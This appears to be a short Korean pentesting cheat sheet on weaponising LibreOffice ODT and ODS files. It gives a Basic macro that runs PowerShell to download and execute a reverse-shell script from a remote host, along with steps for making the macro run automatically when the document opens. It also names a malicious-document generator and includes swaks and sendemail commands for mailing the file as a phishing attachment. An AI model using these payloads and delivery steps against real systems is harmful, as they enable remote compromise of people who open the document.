LibreOffice ODT ODS

# .odt `ODT (OpenDocument Text)`는 사실상 `ZIP` 파일이다. 구조를 풀어보면 이런식으로 나온다: ```bash content.xml styles.xml meta.xml manifest.xml Pictures/ Thumbnails/ ``` 악성 매크로는 `content.xml`안에 `<script:script>` 블록으로 넣을 수 있다. 예시 `LibreOffice Basic Macro - Reverse Shell` ```bash Sub Main Shell("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.45.174:8000/Invoke-PowerShellTcp.ps1')") End Sub ``` ```bash #1. libreoffice -> save as .odt #2. Tools -> Macros -> Organize Macros -> Basic -> Select a document and create a new one #3. Write the reverse shell above #4. Tools -> Customize -> Events -> Open Document -> Macro -> Select the function of the macro you created ``` --- # Malicious ODS, ODT payloads https://github.com/0bfxgh0st/MMG-LO/ ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 mmg-odt.py windows 192.168.45.152 1234 [+] Payload: windows reverse shell [+] Creating malicious .odt file Done. ``` Uploading `.odt` file using [[swaks]] ```bash sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server $IP --body "Please check this spreadsheet" --header "Subject: Please check this spreadsheet" ``` --- payload ```bash Sub Main Shell("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.45.174:8000/Invoke-PowerShellTcpEx.ps1')") End Sub ``` ``` Sendemail ```bash Required: -f ADDRESS from (sender) email address * At least one recipient required via -t, -cc, or -bcc * Message body required via -m, STDIN, or -o message-file=FILE Common: -t ADDRESS [ADDR ...] to email address(es) -u SUBJECT message subject -m MESSAGE message body -s SERVER[:PORT] smtp mail relay, default is localhost:25 -S [SENDMAIL_PATH] use local sendmail utility (default: /usr/bin/sendmail) instead of network MTA Optional: -a FILE [FILE ...] file attachment(s) -cc ADDRESS [ADDR ...] cc email address(es) -bcc ADDRESS [ADDR ...] bcc email address(es) -xu USERNAME username for SMTP authentication -xp PASSWORD password for SMTP authentication ``` ```bash sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.184.140:25 -u 'another spreadsheet' -m 'spreadsheet' -a /home/kali/pentestools/windows/clientside/test.ods ```